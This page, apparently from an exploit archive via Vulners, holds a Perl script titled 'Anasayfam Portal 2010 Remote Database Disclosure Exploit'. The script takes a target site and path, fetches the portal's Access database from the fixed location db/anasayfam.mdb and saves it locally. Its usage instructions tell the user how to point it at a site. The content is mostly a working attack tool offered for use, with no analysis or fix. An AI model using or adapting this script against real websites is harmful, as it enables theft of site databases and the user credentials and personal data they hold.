Lucene search
K

Anasayfam Portal 2010 Remote Database Disclosure Exploit

🗓️ 19 Aug 2010 00:00:00Reported by BARCOD3Type 
zdt
 zdt
🔗 0day.today👁 16 Views

Anasayfam Portal 2010 Remote Database Disclosure Exploit using Per

Code
========================================================
Anasayfam Portal 2010 Remote Database Disclosure Exploit
========================================================

#!/usr/bin/perl -w
#
# Anasayfam Portal 2010 / Database Disclosure Exploit
#
# Coded: BARCOD3
# 
#
#
#
# Thanks: DaiMon, KnocKout, NeT-Excellans all Logystics.
#
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Anasayfam Portal 2010 Remote Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Example Exp.\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Anasayfam 2010 Remote Database Disclosure Exploit              *\n";
print "\* auth0r : BARCOD3                                                  *\n";
print "\* contact :   ozk4nbozkurt[at]hotmail[dot]com                                 *\n";
print "\* Special thx. DaiMon, KnocKout, NeT-Excellans all Logystics.                         *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="db/anasayfam.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/anasayfam.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/anasayfam.mdb\n";
exit();
}
else
{
print "[!] Dur la dur sakin ol $url olmadi bu !\n[!] ".$request->status_line."\n";
exit();
}



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1
16